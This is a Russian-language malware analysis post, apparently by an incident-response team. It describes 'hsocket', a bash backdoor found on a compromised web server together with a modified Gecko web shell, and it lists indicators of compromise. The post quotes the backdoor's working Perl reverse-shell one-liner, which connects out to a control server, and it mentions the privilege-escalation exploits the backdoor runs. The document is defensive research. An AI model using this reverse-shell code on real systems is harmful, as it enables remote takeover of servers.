[ << ALL_FEED ]

Он вам не gsocket

Ещё в группе «Вредоносное ПО»

  • Этот ваш Siemens…

    Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его…

  • Анти-антивирус

    Недавно нам на глаза попалась APK-шка с интригующим и внушающим доверие названием «Антивирус ФСБ.apk». Установив его,…

  • .exe .docm .xlsm

    .exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте…

  • Операция Chewbacca

    В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум…

  • Ваш сервер Zimbra под угрозой

    Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с…

Он вам не gsocket 😑

В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket).

После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.

1️⃣ hsocket — бэкдор, имеющий следующий функционал:

• запуск интерактивной командной оболочки

• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)

• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)

• защита файлов от удаления

• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:

perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};"

• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)

2️⃣ hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.

3️⃣ .hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.

В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО.

Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:

// Fungsi untuk tampilan halaman login
$Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari";

Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:

//------------------GECKO SHELL, RECODED BY AYANA--------------------//
<!-- Gecko Folder File Manager -->

IoC:

hsocket.io
/tmp/hs-data/

#ir #dfir #detect #ioc #malware
@ptescalator

Ещё от oUth0R

Ещё от oUth0R

Ещё в группе «Вредоносное ПО»

  • Этот ваш Siemens…

    Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его…

  • Анти-антивирус

    Недавно нам на глаза попалась APK-шка с интригующим и внушающим доверие названием «Антивирус ФСБ.apk». Установив его,…

  • .exe .docm .xlsm

    .exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте…

  • Операция Chewbacca

    В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум…

  • Ваш сервер Zimbra под угрозой

    Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с…